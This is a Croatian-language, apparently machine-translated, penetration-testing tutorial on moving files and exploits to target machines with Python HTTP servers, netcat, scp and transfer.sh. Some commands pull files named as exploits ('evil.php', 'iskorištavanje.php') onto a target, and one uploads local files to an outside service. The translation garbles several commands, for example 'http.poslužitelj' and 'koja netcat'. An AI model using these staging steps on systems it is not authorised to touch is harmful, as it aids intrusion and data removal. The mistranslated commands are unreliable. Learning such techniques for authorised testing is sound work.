Phenquestions
Prijenos exploita, python skripti i modula za učitavanje često su potrebni tijekom aktivnosti testiranja penetracije. Budući da je terminal alat koji se uglavnom koristi, neophodno je razumjeti osnove prijenosa datoteka.
Tester olovke trebao bi biti dobro opremljen različitim trikovima za prijenos datoteka s udaljenog poslužitelja, kao i iz jednog direktorija u drugi. U ovom uputstvu razgovarat ćemo o različitim načinima prijenosa datoteka pomoću naredbenog retka.
1. Python poslužitelj
Python je osnovni paket koji dolazi unaprijed instaliran u gotovo svim sustavima temeljenim na Debianu. Da biste datoteku prenijeli s jednog računala na drugi, učinite sljedeće;
Python2:
Prebacite se u direktorij u kojem postoji datoteka koju želite prenijeti. Pokrenite jednostavni python poslužitelj. Unesite sljedeću naredbu;
$ python -m SimpleHTTPServer 8080
Sada idite na stroj gdje želite prenijeti datoteku. Upotrijebite sljedeću naredbu za preuzimanje datoteke;
$ wget http: // 192.168.43.177: 8080 / spis
Ne zaboravite zamijeniti IP, broj porta i naziv datoteke.
Python3:
Sve što je napisano na python2, gotovo će se uvijek slomiti na python3. Dakle, također gledamo kako prenijeti datoteku pomoću python3.
U slučaju python3, unesite sljedeću naredbu za pokretanje jednostavnog python poslužitelja.
$ python3 -m http.poslužitelj 8080
Da biste preuzeli datoteku na cilj, unesite sljedeću naredbu;
$ wget http: // 192.168.43.177: 8080 / iskorištavanje.php
2. Netcat
Netcat je moćan uslužni program za prijenos datoteka s bilo kojeg udaljenog računala na lokalni stroj. Možda se neće uvijek instalirati. Unosom možete provjeriti postoji li ili ne;
$ koja netcat
Alternativno, ulaskom;$ koji nc
Napravite netcat poslužitelj sa sljedećom naredbom;
$ nc -nlvp 8080 < evil.php
Sada idite na ciljni stroj i unesite sljedeće za preuzimanje datoteke;
$ nc -nv 192.168.43.177 8080> zlo.php
Zamijeniti nc s netcat u gornjim naredbama ako nc ne radi ili nije ispravno instaliran.
3. SCP
Protokol sigurnog kopiranja moćan je alat za prijenos datoteka. Dobro dođe, posebno kada želite prenijeti direktorije. Također se uglavnom koristi za prijenos datoteka putem ssh-a.
Za prijenos datoteke putem ssh, unesite sljedeću naredbu na pošiljatelju;
$ scp -i novo.pem test.py ubuntu @ 18.220.68.229: / home / ubuntu
Gdje -i predstavlja javni ključ za ssh prijavu, test.py je datoteka koju treba prenijeti i / home / ubuntu je ciljni direktorij u koji želimo spremiti datoteku.
Da biste preuzeli datoteku s udaljenog računala, unesite sljedeću naredbu;
$ scp root @ 192.168.43.177: / remote_directory / file / local / directory
4. Prijenos.sh
Ovaj alat treće strane možete koristiti za prijenos datoteka. To može biti korisno kada nemate stroj s javnom IP adresom, a datoteke i dalje morate prenositi. Sljedeća naredba prenosi datoteku na prijenos.sh poslužitelji;
$ curl --upload-datoteka ./datoteka.txt https: // prijenos.sh / datoteka.txt
Da biste preuzeli datoteku, unesite sljedeću naredbu;
$ curl https: // prijenos.sh // datoteka.txt -o datoteka.txt
Prijenos.sh je još uvijek u fazi izrade i možda neće raditi uvijek.
Zaključak
Alati naredbenog retka daju nam mogućnost prijenosa datoteka na razne načine. Oni se mogu činiti pomalo kompliciranima, ali dobivanje praktičnih mogućnosti omogućuje im jednostavno upravljanje datotekama, pogotovo kad GUI opcija nije dostupna.
